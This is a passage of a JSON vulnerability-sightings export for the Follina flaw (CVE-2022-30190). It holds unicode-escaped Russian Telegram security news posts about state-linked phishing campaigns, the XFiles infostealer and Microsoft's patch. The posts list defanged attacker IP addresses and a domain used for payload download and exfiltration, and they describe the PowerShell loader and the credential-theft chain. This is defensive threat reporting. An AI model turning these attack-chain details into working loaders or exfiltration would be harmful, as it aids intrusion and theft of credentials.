\u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435 \u0421\u041c\u0418 \u043c\u043e\u0436\u0435\u0442 \u0441\u0442\u043e\u044f\u0442\u044c APT-\u0433\u0440\u0443\u043f\u043f\u0430 Sandworm, \u0441\u0432\u044f\u0437\u044b\u0432\u0430\u0435\u043c\u0430\u044f \u0441 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e\u043c \u0420\u0424.\n\n#\u0425\u0430\u043a\u0435\u0440\u044b #Sandworm #Follina\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-06-14T15:48:06.000000Z"}, {"uuid": "270b2c4d-fb8a-4cda-8edc-c4c7c138e99b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/772", "content": "\u200b\u26a1\ufe0f \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina \u0441\u0442\u0430\u043b\u0430 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0438\u043c \u043a\u0438\u0431\u0435\u0440\u043e\u0440\u0443\u0436\u0438\u0435\u043c.\n\n\ud83d\udcac \u041d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u0441\u0443\u0431\u044a\u0435\u043a\u0442 \u0443\u0433\u0440\u043e\u0437\u044b, \u0441\u043f\u043e\u043d\u0441\u0438\u0440\u0443\u0435\u043c\u044b\u0439 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u043e\u043c, \u043f\u0440\u043e\u0432\u0435\u043b \u043d\u043e\u0432\u0443\u044e \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0443 \u043d\u0430 \u0433\u043e\u0441\u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0415\u0432\u0440\u043e\u043f\u044b \u0438 \u0421\u0428\u0410. \u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Proofpoint \u0437\u0430\u044f\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 CVE-2022-30190 c \u043e\u0446\u0435\u043d\u043a\u043e\u0439 CVSS 7,8. \u0426\u0435\u043b\u044f\u043c \u0431\u044b\u043b\u043e \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u0435 1000 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0445 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442-\u043f\u0440\u0438\u043c\u0430\u043d\u043a\u0443.\n\n\u00ab\u042d\u0442\u0430 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u043f\u043e\u0434 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u044b \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430 RTF \u0441 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u0430, \u0437\u0430\u0433\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0439 \u0441 45.76.53[.]253\u00bb, \u2014 \u043d\u0430\u043f\u0438\u0441\u0430\u043b\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u0432 Twitter .\n\n\u041f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0432 \u0432\u0438\u0434\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0438\u043c\u0435\u0435\u0442 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u0443 Base64 \u0438 \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u0443\u0435\u0442 \u043a\u0430\u043a \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0441 \u0438\u043c\u0435\u043d\u0435\u043c \u00abseller-notification[.]live\u00bb.\n\n\u00ab\u042d\u0442\u043e\u0442 \u0441\u043a\u0440\u0438\u043f\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 , \u043a\u0440\u0430\u0434\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u0437 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432, \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0445 \u0441\u043b\u0443\u0436\u0431, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430, \u0430 \u0437\u0430\u0442\u0435\u043c \u0430\u0440\u0445\u0438\u0432\u0438\u0440\u0443\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 45.77.156[.]179\u00bb, \u2014 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0438 \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Proofpoint.\n\n\u0424\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u0430\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043d\u0435 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439, \u043d\u043e \u043e\u043d\u0430 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u0441 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u043a\u043e\u0439 \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0430 \u043d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u043a\u0438 \u0430\u0442\u0430\u043a\u0438 \u0438 \u0448\u0438\u0440\u043e\u043a\u0438\u0445 \u0440\u0430\u0437\u0432\u0435\u0434\u044b\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 PowerShell.\n\n\u00ab\u041e\u0431\u0448\u0438\u0440\u043d\u0430\u044f \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430, \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u043d\u0430\u044f \u0432\u0442\u043e\u0440\u044b\u043c \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u0435\u043c PowerShell, \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u0437\u0430\u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432\u0430\u043d \u0431\u043e\u043b\u044c\u0448\u0438\u043c \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e\u043c \u041f\u041e \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u0446\u0435\u043b\u0438. \u0410\u0442\u0430\u043a\u0430 \u043d\u0430 \u0435\u0432\u0440\u043e\u043f\u0435\u0439\u0441\u043a\u043e\u0435 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u043e \u0438 \u043c\u0435\u0441\u0442\u043d\u044b\u0435 \u043e\u0440\u0433\u0430\u043d\u044b \u0432\u043b\u0430\u0441\u0442\u0438 \u0421\u0428\u0410 \u0437\u0430\u0441\u0442\u0430\u0432\u0438\u043b\u0430 \u043d\u0430\u0441 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u0430 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u043e\u043c\u00bb, \u2014 \u0434\u043e\u0431\u0430\u0432\u0438\u043b\u0430 Proofpoint.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Follina \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0441\u0445\u0435\u043c\u0443 URI \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u00abms-msdt\u00bb \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0446\u0435\u043b\u0435\u0432\u044b\u043c\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438 \u0438 \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u043e\u0441\u0442\u0430\u0435\u0442\u0441\u044f \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u043e\u0439. \u041f\u043e\u0441\u043b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c Microsoft \u043f\u0440\u0438\u0437\u0432\u0430\u043b\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b , \u0447\u0442\u043e\u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c \u0432\u0435\u043a\u0442\u043e\u0440 \u0430\u0442\u0430\u043a\u0438. \u0422\u0430\u043a\u0436\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0443\u0436\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0420\u043e\u0441\u0441\u0438\u0438, \u0411\u0435\u043b\u0430\u0440\u0443\u0441\u0438 \u0438 \u0422\u0438\u0431\u0435\u0442\u0430 .\n\n#Follina #\u041a\u0438\u0431\u0435\u0440\u043e\u0440\u0443\u0436\u0438\u0435 #\u0425\u0430\u043a\u0435\u0440\u044b\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-06-06T13:17:42.000000Z"}, {"uuid": "66eb799b-ebd0-4b41-a27c-227c2423e26c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/833", "content": "\u200b\u2694\ufe0f Microsoft \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0443\u044e 0-day Follina \u0438 \u0435\u0449\u0435 55 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439.\n\n\ud83d\udcac \u0418\u0437 55 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0442\u0440\u0438 \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u043a\u0430\u043a \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c RCE-\u0430\u0442\u0430\u043a\u0438. \u0412\u0441\u0435 \u043e\u0441\u0442\u0430\u043b\u044c\u043d\u044b\u0435 \u043a\u043b\u0430\u0441\u0441\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u043a\u0430\u043a \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435. \u0412 \u043f\u0430\u0442\u0447 \u043d\u0435 \u0432\u043e\u0448\u043b\u0438 5 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 Microsoft Edge Chromium, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0431\u044b\u043b\u0438 \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u044b \u0440\u0430\u043d\u0435\u0435 \u043d\u0430 \u044d\u0442\u043e\u0439 \u043d\u0435\u0434\u0435\u043b\u0435.\n\n\u041d\u0438\u0436\u0435 \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u043e \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u043e\u0448\u0438\u0431\u043e\u043a \u0432 \u043a\u0430\u0436\u0434\u043e\u0439 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439:\n\n\u2014 12 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439;\n\u2014 1 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0431\u0445\u043e\u0434\u0430 \u0444\u0443\u043d\u043a\u0446\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438;\n\u2014 27 RCE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439;\n\u2014 11 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438;\n\u2014 3 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043e\u0442\u043a\u0430\u0437\u0430 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438;\n\u2014 1 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u044c \u0441\u043f\u0443\u0444\u0438\u043d\u0433.\n\n\u0425\u043e\u0447\u0435\u0442\u0441\u044f \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u043d\u0430\u0448\u0443\u043c\u0435\u0432\u0448\u0435\u0439 0-day Follina. \u041c\u044b \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0437 \u0441\u043e\u043e\u0431\u0449\u0430\u043b\u0438 \u043f\u0440\u043e \u0430\u0442\u0430\u043a\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u043e\u0431\u044a\u044f\u0441\u043d\u0438\u043b\u0438 \u043f\u0440\u0438\u0447\u0438\u043d\u0443 \u0435\u0435 \u043f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u044f.\n\nFollina \u0438\u043b\u0438 \u0436\u0435 CVE-2022-30190 \u0441\u0440\u0430\u0437\u0443 \u0436\u0435 \u043f\u0440\u0438\u0433\u043b\u044f\u043d\u0443\u043b\u0430\u0441\u044c \u0445\u0430\u043a\u0435\u0440\u0430\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u0440\u0438\u043d\u044f\u043b\u0438\u0441\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0435\u0435 \u0432 \u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445. \u0421\u0430\u043c\u044b\u043c\u0438 \u0433\u0440\u043e\u043c\u043a\u0438\u043c\u0438 \u0441\u043b\u0443\u0447\u0430\u044f\u043c\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0441\u0442\u0430\u043b\u0438:\n\n\u2014 \u0410\u0442\u0430\u043a\u0430 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0433\u043e \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0445\u0430\u043a\u0435\u0440\u0430 \u043d\u0430 \u0433\u043e\u0441\u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0415\u0421 \u0438 \u0421\u0428\u0410;\n\u2014 \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u041f\u041e Qbot;\n\u2014 \u0410\u0442\u0430\u043a\u0430 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 Sandworm \u043d\u0430 \u0443\u043a\u0440\u0430\u0438\u043d\u0441\u043a\u0438\u0435 \u0421\u041c\u0418.\n\n\u041f\u0430\u0442\u0447 \u0431\u0443\u0434\u0435\u0442 \u0432\u043a\u043b\u044e\u0447\u0435\u043d \u0432 \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f Windows \u0437\u0430 \u0438\u044e\u043d\u044c 2022 \u0433\u043e\u0434\u0430.\n\n#Microsoft #Follina #\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-06-16T05:16:47.000000Z"}, {"uuid": "01f88c79-c870-48d1-862f-8cc316e4198f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/itsec_news/924", "content": "\u200b\u2694\ufe0f \u0418\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440 XFiles \u0430\u0442\u0430\u043a\u0443\u0435\u0442 Windows \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Follina.\n\n\ud83d\udcac \u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0438\u0437 Cyberint \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0438\u043d\u0444\u043e\u0441\u0442\u0438\u043b\u0435\u0440 XFiles \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-30190 (Follina) \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0435 \u0436\u0435\u0440\u0442\u0432\u044b.\n\n\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442 Word \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 OLE-\u043e\u0431\u044a\u0435\u043a\u0442, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u0439 \u043d\u0430 HTML-\u0444\u0430\u0439\u043b \u043d\u0430 \u0432\u043d\u0435\u0448\u043d\u0435\u043c \u0440\u0435\u0441\u0443\u0440\u0441\u0435, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c JavaScript-\u043a\u043e\u0434. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f PowerShell-\u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0434\u043b\u044f \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0432 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0435 Windows \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e. \u0414\u0430\u043b\u0435\u0435 \u043c\u043e\u0434\u0443\u043b\u044c \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u044d\u0442\u0430\u043f\u0430 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u0437\u0430\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0448\u0435\u043b\u043b-\u043a\u043e\u0434. \u041e\u043d \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u043b\u044e\u0447\u043e\u043c AES-\u0434\u0435\u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0432 \u0442\u043e\u043c \u0436\u0435 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u043c \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0447\u0435\u0440\u0435\u0437 \u0432\u044b\u0437\u043e\u0432 API.\n\n\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f XFiles \u043a\u0440\u0430\u0434\u0435\u0442 cookie-\u0444\u0430\u0439\u043b\u044b, \u043f\u0430\u0440\u043e\u043b\u0438 \u0438 \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u0432\u0435\u0431-\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430, \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u044f\u0435\u0442 \u043f\u0430\u0440\u043e\u043b\u044c \u043a\u0440\u0438\u043f\u0442\u043e\u043a\u043e\u0448\u0435\u043b\u044c\u043a\u0430, \u0441\u043e\u0437\u0434\u0430\u0435\u0442 \u0441\u043d\u0438\u043c\u043a\u0438 \u044d\u043a\u0440\u0430\u043d\u0430, \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u0443\u0435\u0442 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Discord \u0438 Telegram.\n\n\u0424\u0430\u0439\u043b\u044b \u0445\u0440\u0430\u043d\u044f\u0442\u0441\u044f \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e \u0432\u043e \u0432\u043d\u043e\u0432\u044c \u0441\u043e\u0437\u0434\u0430\u043d\u043d\u044b\u0445 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430\u0445 \u0438 \u043d\u0435\u0437\u0430\u043c\u0435\u0442\u043d\u043e \u0438\u0437\u0432\u043b\u0435\u043a\u0430\u044e\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 Telegram.\n\n#\u0421\u0442\u0438\u043b\u0435\u0440 #\u0425\u0430\u043a\u0435\u0440\u044b #Follina #XFiles\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-07-01T12:58:38.000000Z"}, {"uuid": "fdee8266-f54a-4cdf-8a4d-d5f7ad7af883", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/codeby_sec/5990", "content": "\u200b\ud83d\udccb Microsoft \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u0434\u0435\u0442\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Microsoft Office\n\n\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Microsoft \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u0434\u0435\u0442\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432\u043e \u0432\u0441\u0435\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0441\u0432\u043e\u0435\u0433\u043e \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0438 \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430 Microsoft Office. \u0414\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u043f\u043e\u0434 \u043d\u043e\u043c\u0435\u0440\u043e\u043c CVE-2022-30190.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u0432\u0435\u0440\u0441\u0438\u0438 Microsoft Office \u0441 2016 \u043f\u043e 2021 \u0438 Office 365. \u0412 \u0441\u0435\u0442\u0438 \u0443\u0436\u0435 \u0435\u0441\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u0439, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u0430\u044f 